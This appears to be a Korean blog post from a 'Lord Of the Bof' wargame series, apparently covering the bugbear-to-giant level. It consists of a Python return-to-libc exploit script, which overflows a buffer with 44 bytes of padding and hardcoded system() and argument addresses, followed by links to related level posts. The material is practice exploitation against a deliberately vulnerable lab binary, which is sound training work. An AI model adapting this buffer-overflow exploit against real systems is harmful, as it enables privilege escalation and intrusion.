exploit.py
import os
from struct import *
p = lambda x : pack("<L" , x)
path = '/home/bugbear/'+p(0xbffffc79)
systemAddress = p(0x400A9D48)
param1 = p(0xbffffc79)
param2 = p(0xbffffff7)
param3 = p(0xbffffffc)
payload = "A"*44 + systemAddress + "BBBB" + param1 + param2 + param3
os.system("mv /home/bugbear/giant "+p(0xbffffc79))
os.execl(path,path,payload)
'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글
[Remind] LOB assassin -> zombie_assassin (0) | 2019.04.19 |
---|---|
[Remind] LOB giant-> assassin (0) | 2019.04.18 |
[Remind] LOB darkknight -> bugbear (0) | 2019.04.16 |
[Remind] LOB golem -> darkknight (0) | 2019.04.16 |
[Remind] LOB skeleton -> golem (0) | 2019.04.16 |